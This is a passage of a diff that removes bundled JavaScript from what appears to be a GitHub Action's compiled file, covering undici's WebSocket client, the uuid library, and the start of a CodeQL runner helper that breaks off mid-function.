- failWebsocketConnection(this, 'Connection was closed before it was established.') - this[kReadyState] = WebSocket.CLOSING - } else if (!isClosing(this)) { - // If the WebSocket closing handshake has not yet been started - // Start the WebSocket closing handshake and set this's ready - // state to CLOSING (2). - // - If neither code nor reason is present, the WebSocket Close - // message must not have a body. - // - If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - // - If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - - const frame = new WebsocketFrameSend() - - // If neither code nor reason is present, the WebSocket Close - // message must not have a body. - - // If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - if (code !== undefined && reason === undefined) { - frame.frameData = Buffer.allocUnsafe(2) - frame.frameData.writeUInt16BE(code, 0) - } else if (code !== undefined && reason !== undefined) { - // If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) - frame.frameData.writeUInt16BE(code, 0) - // the body MAY contain UTF-8-encoded data with value /reason/ - frame.frameData.write(reason, 2, 'utf-8') - } else { - frame.frameData = emptyBuffer - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - socket.write(frame.createFrame(opcodes.CLOSE), (err) => { - if (!err) { - this[kSentClose] = true - } - }) - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this[kReadyState] = states.CLOSING - } else { - // Otherwise - // Set this's ready state to CLOSING (2). 
- this[kReadyState] = WebSocket.CLOSING - } - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-send - * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data - */ - send (data) { - webidl.brandCheck(this, WebSocket) - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) - - data = webidl.converters.WebSocketSendData(data) - - // 1. If this's ready state is CONNECTING, then throw an - // "InvalidStateError" DOMException. - if (this[kReadyState] === WebSocket.CONNECTING) { - throw new DOMException('Sent before connected.', 'InvalidStateError') - } - - // 2. Run the appropriate set of steps from the following list: - // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 - // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 - - if (!isEstablished(this) || isClosing(this)) { - return - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - // If data is a string - if (typeof data === 'string') { - // If the WebSocket connection is established and the WebSocket - // closing handshake has not yet started, then the user agent - // must send a WebSocket Message comprised of the data argument - // using a text frame opcode; if the data cannot be sent, e.g. - // because it would need to be buffered but the buffer is full, - // the user agent must flag the WebSocket as full and then close - // the WebSocket connection. Any invocation of this method with a - // string argument that does not throw an exception must increase - // the bufferedAmount attribute by the number of bytes needed to - // express the argument as UTF-8. 
- - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.TEXT) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (types.isArrayBuffer(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need - // to be buffered but the buffer is full, the user agent must flag - // the WebSocket as full and then close the WebSocket connection. - // The data to be sent is the data stored in the buffer described - // by the ArrayBuffer object. Any invocation of this method with an - // ArrayBuffer argument that does not throw an exception must - // increase the bufferedAmount attribute by the length of the - // ArrayBuffer in bytes. - - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (ArrayBuffer.isView(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The - // data to be sent is the data stored in the section of the buffer - // described by the ArrayBuffer object that data references. 
Any - // invocation of this method with this kind of argument that does - // not throw an exception must increase the bufferedAmount attribute - // by the length of data’s buffer in bytes. - - const ab = Buffer.from(data, data.byteOffset, data.byteLength) - - const frame = new WebsocketFrameSend(ab) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += ab.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= ab.byteLength - }) - } else if (isBlobLike(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The data - // to be sent is the raw data represented by the Blob object. Any - // invocation of this method with a Blob argument that does not throw - // an exception must increase the bufferedAmount attribute by the size - // of the Blob object’s raw data, in bytes. - - const frame = new WebsocketFrameSend() - - data.arrayBuffer().then((ab) => { - const value = Buffer.from(ab) - frame.frameData = value - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - }) - } - } - - get readyState () { - webidl.brandCheck(this, WebSocket) - - // The readyState getter steps are to return this's ready state. - return this[kReadyState] - } - - get bufferedAmount () { - webidl.brandCheck(this, WebSocket) - - return this.#bufferedAmount - } - - get url () { - webidl.brandCheck(this, WebSocket) - - // The url getter steps are to return this's url, serialized. 
- return URLSerializer(this[kWebSocketURL]) - } - - get extensions () { - webidl.brandCheck(this, WebSocket) - - return this.#extensions - } - - get protocol () { - webidl.brandCheck(this, WebSocket) - - return this.#protocol - } - - get onopen () { - webidl.brandCheck(this, WebSocket) - - return this.#events.open - } - - set onopen (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.open) { - this.removeEventListener('open', this.#events.open) - } - - if (typeof fn === 'function') { - this.#events.open = fn - this.addEventListener('open', fn) - } else { - this.#events.open = null - } - } - - get onerror () { - webidl.brandCheck(this, WebSocket) - - return this.#events.error - } - - set onerror (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.error) { - this.removeEventListener('error', this.#events.error) - } - - if (typeof fn === 'function') { - this.#events.error = fn - this.addEventListener('error', fn) - } else { - this.#events.error = null - } - } - - get onclose () { - webidl.brandCheck(this, WebSocket) - - return this.#events.close - } - - set onclose (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.close) { - this.removeEventListener('close', this.#events.close) - } - - if (typeof fn === 'function') { - this.#events.close = fn - this.addEventListener('close', fn) - } else { - this.#events.close = null - } - } - - get onmessage () { - webidl.brandCheck(this, WebSocket) - - return this.#events.message - } - - set onmessage (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.message) { - this.removeEventListener('message', this.#events.message) - } - - if (typeof fn === 'function') { - this.#events.message = fn - this.addEventListener('message', fn) - } else { - this.#events.message = null - } - } - - get binaryType () { - webidl.brandCheck(this, WebSocket) - - return this[kBinaryType] - } - - set binaryType (type) { - webidl.brandCheck(this, WebSocket) - - if (type !== 'blob' && type !== 
'arraybuffer') { - this[kBinaryType] = 'blob' - } else { - this[kBinaryType] = type - } - } - - /** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - */ - #onConnectionEstablished (response) { - // processResponse is called when the "response’s header list has been received and initialized." - // once this happens, the connection is open - this[kResponse] = response - - const parser = new ByteParser(this) - parser.on('drain', function onParserDrain () { - this.ws[kResponse].socket.resume() - }) - - response.socket.ws = this - this[kByteParser] = parser - - // 1. Change the ready state to OPEN (1). - this[kReadyState] = states.OPEN - - // 2. Change the extensions attribute’s value to the extensions in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 - const extensions = response.headersList.get('sec-websocket-extensions') - - if (extensions !== null) { - this.#extensions = extensions - } - - // 3. Change the protocol attribute’s value to the subprotocol in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 - const protocol = response.headersList.get('sec-websocket-protocol') - - if (protocol !== null) { - this.#protocol = protocol - } - - // 4. Fire an event named open at the WebSocket object. 
- fireEvent('open', this) - } -} - -// https://websockets.spec.whatwg.org/#dom-websocket-connecting -WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING -// https://websockets.spec.whatwg.org/#dom-websocket-open -WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN -// https://websockets.spec.whatwg.org/#dom-websocket-closing -WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING -// https://websockets.spec.whatwg.org/#dom-websocket-closed -WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED - -Object.defineProperties(WebSocket.prototype, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors, - url: kEnumerableProperty, - readyState: kEnumerableProperty, - bufferedAmount: kEnumerableProperty, - onopen: kEnumerableProperty, - onerror: kEnumerableProperty, - onclose: kEnumerableProperty, - close: kEnumerableProperty, - onmessage: kEnumerableProperty, - binaryType: kEnumerableProperty, - send: kEnumerableProperty, - extensions: kEnumerableProperty, - protocol: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'WebSocket', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(WebSocket, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors -}) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.DOMString -) - -webidl.converters['DOMString or sequence'] = function (V) { - if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { - return webidl.converters['sequence'](V) - } - - return webidl.converters.DOMString(V) -} - -// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 -webidl.converters.WebSocketInit = webidl.dictionaryConverter([ - { - key: 'protocols', - converter: webidl.converters['DOMString or sequence'], - 
get defaultValue () { - return [] - } - }, - { - key: 'dispatcher', - converter: (V) => V, - get defaultValue () { - return getGlobalDispatcher() - } - }, - { - key: 'headers', - converter: webidl.nullableConverter(webidl.converters.HeadersInit) - } -]) - -webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { - if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { - return webidl.converters.WebSocketInit(V) - } - - return { protocols: webidl.converters['DOMString or sequence'](V) } -} - -webidl.converters.WebSocketSendData = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { - return webidl.converters.BufferSource(V) - } - } - - return webidl.converters.USVString(V) -} - -module.exports = { - WebSocket -} - - -/***/ }), - -/***/ 5840: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -Object.defineProperty(exports, "v1", ({ - enumerable: true, - get: function () { - return _v.default; - } -})); -Object.defineProperty(exports, "v3", ({ - enumerable: true, - get: function () { - return _v2.default; - } -})); -Object.defineProperty(exports, "v4", ({ - enumerable: true, - get: function () { - return _v3.default; - } -})); -Object.defineProperty(exports, "v5", ({ - enumerable: true, - get: function () { - return _v4.default; - } -})); -Object.defineProperty(exports, "NIL", ({ - enumerable: true, - get: function () { - return _nil.default; - } -})); -Object.defineProperty(exports, "version", ({ - enumerable: true, - get: function () { - return _version.default; - } -})); -Object.defineProperty(exports, "validate", ({ - enumerable: true, - get: function () { - return _validate.default; - } -})); -Object.defineProperty(exports, "stringify", ({ - enumerable: true, - get: function () { 
- return _stringify.default; - } -})); -Object.defineProperty(exports, "parse", ({ - enumerable: true, - get: function () { - return _parse.default; - } -})); - -var _v = _interopRequireDefault(__nccwpck_require__(8628)); - -var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); - -var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); - -var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); - -var _nil = _interopRequireDefault(__nccwpck_require__(5332)); - -var _version = _interopRequireDefault(__nccwpck_require__(1595)); - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/***/ }), - -/***/ 4569: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function md5(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('md5').update(bytes).digest(); -} - -var _default = md5; -exports["default"] = _default; - -/***/ }), - -/***/ 5332: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = '00000000-0000-0000-0000-000000000000'; -exports["default"] = _default; - -/***/ }), - -/***/ 2746: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function parse(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - let v; - const arr = new Uint8Array(16); // Parse ########-....-....-....-............ - - arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; - arr[1] = v >>> 16 & 0xff; - arr[2] = v >>> 8 & 0xff; - arr[3] = v & 0xff; // Parse ........-####-....-....-............ - - arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; - arr[5] = v & 0xff; // Parse ........-....-####-....-............ - - arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; - arr[7] = v & 0xff; // Parse ........-....-....-####-............ 
- - arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; - arr[9] = v & 0xff; // Parse ........-....-....-....-############ - // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) - - arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; - arr[11] = v / 0x100000000 & 0xff; - arr[12] = v >>> 24 & 0xff; - arr[13] = v >>> 16 & 0xff; - arr[14] = v >>> 8 & 0xff; - arr[15] = v & 0xff; - return arr; -} - -var _default = parse; -exports["default"] = _default; - -/***/ }), - -/***/ 814: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; -var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; -exports["default"] = _default; - -/***/ }), - -/***/ 807: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = rng; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate - -let poolPtr = rnds8Pool.length; - -function rng() { - if (poolPtr > rnds8Pool.length - 16) { - _crypto.default.randomFillSync(rnds8Pool); - - poolPtr = 0; - } - - return rnds8Pool.slice(poolPtr, poolPtr += 16); -} - -/***/ }), - -/***/ 5274: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function sha1(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('sha1').update(bytes).digest(); -} - -var _default = sha1; -exports["default"] = _default; - -/***/ }), - -/***/ 8950: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -const byteToHex = []; - -for (let i = 0; i < 256; ++i) { - byteToHex.push((i + 0x100).toString(16).substr(1)); -} - -function stringify(arr, offset = 0) { - // Note: Be careful editing this code! It's been tuned for performance - // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 - const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. 
If this throws, it's likely due to one - // of the following: - // - One or more input array values don't map to a hex octet (leading to - // "undefined" in the uuid) - // - Invalid input values for the RFC `version` or `variant` fields - - if (!(0, _validate.default)(uuid)) { - throw TypeError('Stringified UUID is invalid'); - } - - return uuid; -} - -var _default = stringify; -exports["default"] = _default; - -/***/ }), - -/***/ 8628: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -// **`v1()` - Generate time-based UUID** -// -// Inspired by https://github.com/LiosK/UUID.js -// and http://docs.python.org/library/uuid.html -let _nodeId; - -let _clockseq; // Previous uuid creation time - - -let _lastMSecs = 0; -let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details - -function v1(options, buf, offset) { - let i = buf && offset || 0; - const b = buf || new Array(16); - options = options || {}; - let node = options.node || _nodeId; - let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not - // specified. We do this lazily to minimize issues related to insufficient - // system entropy. 
See #189 - - if (node == null || clockseq == null) { - const seedBytes = options.random || (options.rng || _rng.default)(); - - if (node == null) { - // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) - node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; - } - - if (clockseq == null) { - // Per 4.2.2, randomize (14 bit) clockseq - clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; - } - } // UUID timestamps are 100 nano-second units since the Gregorian epoch, - // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so - // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' - // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. - - - let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock - // cycle to simulate higher resolution clock - - let nsecs = options.nsecs !== undefined ? 
options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) - - const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression - - if (dt < 0 && options.clockseq === undefined) { - clockseq = clockseq + 1 & 0x3fff; - } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new - // time interval - - - if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { - nsecs = 0; - } // Per 4.2.1.2 Throw error if too many uuids are requested - - - if (nsecs >= 10000) { - throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); - } - - _lastMSecs = msecs; - _lastNSecs = nsecs; - _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch - - msecs += 12219292800000; // `time_low` - - const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; - b[i++] = tl >>> 24 & 0xff; - b[i++] = tl >>> 16 & 0xff; - b[i++] = tl >>> 8 & 0xff; - b[i++] = tl & 0xff; // `time_mid` - - const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; - b[i++] = tmh >>> 8 & 0xff; - b[i++] = tmh & 0xff; // `time_high_and_version` - - b[i++] = tmh >>> 24 & 0xf | 0x10; // include version - - b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) - - b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` - - b[i++] = clockseq & 0xff; // `node` - - for (let n = 0; n < 6; ++n) { - b[i + n] = node[n]; - } - - return buf || (0, _stringify.default)(b); -} - -var _default = v1; -exports["default"] = _default; - -/***/ }), - -/***/ 6409: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _md = _interopRequireDefault(__nccwpck_require__(4569)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -const v3 = (0, _v.default)('v3', 0x30, _md.default); -var _default = v3; -exports["default"] = _default; - -/***/ }), - -/***/ 5998: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = _default; -exports.URL = exports.DNS = void 0; - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function stringToBytes(str) { - str = unescape(encodeURIComponent(str)); // UTF8 escape - - const bytes = []; - - for (let i = 0; i < str.length; ++i) { - bytes.push(str.charCodeAt(i)); - } - - return bytes; -} - -const DNS = '6ba7b810-9dad-11d1-80b4-00c04fd430c8'; -exports.DNS = DNS; -const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; -exports.URL = URL; - -function _default(name, version, hashfunc) { - function generateUUID(value, namespace, buf, offset) { - if (typeof value === 'string') { - value = stringToBytes(value); - } - - if (typeof namespace === 'string') { - namespace = (0, _parse.default)(namespace); - } - - if (namespace.length !== 16) { - throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); - } // Compute hash of namespace and value, Per 4.3 - // Future: Use spread syntax when supported on all platforms, e.g. `bytes = - // hashfunc([...namespace, ... 
value])` - - - let bytes = new Uint8Array(16 + value.length); - bytes.set(namespace); - bytes.set(value, namespace.length); - bytes = hashfunc(bytes); - bytes[6] = bytes[6] & 0x0f | version; - bytes[8] = bytes[8] & 0x3f | 0x80; - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = bytes[i]; - } - - return buf; - } - - return (0, _stringify.default)(bytes); - } // Function#name is not settable on some platforms (#270) - - - try { - generateUUID.name = name; // eslint-disable-next-line no-empty - } catch (err) {} // For CommonJS default export support - - - generateUUID.DNS = DNS; - generateUUID.URL = URL; - return generateUUID; -} - -/***/ }), - -/***/ 5122: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _rng = _interopRequireDefault(__nccwpck_require__(807)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function v4(options, buf, offset) { - options = options || {}; - - const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - - - rnds[6] = rnds[6] & 0x0f | 0x40; - rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided - - if (buf) { - offset = offset || 0; - - for (let i = 0; i < 16; ++i) { - buf[offset + i] = rnds[i]; - } - - return buf; - } - - return (0, _stringify.default)(rnds); -} - -var _default = v4; -exports["default"] = _default; - -/***/ }), - -/***/ 9120: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _v = _interopRequireDefault(__nccwpck_require__(5998)); - -var _sha = _interopRequireDefault(__nccwpck_require__(5274)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -const v5 = (0, _v.default)('v5', 0x50, _sha.default); -var _default = v5; -exports["default"] = _default; - -/***/ }), - -/***/ 6900: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _regex = _interopRequireDefault(__nccwpck_require__(814)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } - -function validate(uuid) { - return typeof uuid === 'string' && _regex.default.test(uuid); -} - -var _default = validate; -exports["default"] = _default; - -/***/ }), - -/***/ 1595: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function version(uuid) { - if (!(0, _validate.default)(uuid)) { - throw TypeError('Invalid UUID'); - } - - return parseInt(uuid.substr(14, 1), 16); -} - -var _default = version; -exports["default"] = _default; - -/***/ }), - -/***/ 950: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolcache = __importStar(__nccwpck_require__(7784)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newCodeQL() { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: core.getInput("packs").length > 0 ? 
core.getInput("packs") : undefined, - }; -} -exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd_arg) { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function findCodeQL() { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} -async function findCodeQlInToolcache() { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - return path.join(candidate.folder, "codeql"); - } - core.warning(`No CodeQL tools found in toolcache.`); - return undefined; -} -async function downloadPack(codeql) { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } - catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} -exports.downloadPack = downloadPack; -async function codeqlDatabaseCreate(codeql) { - // get runner 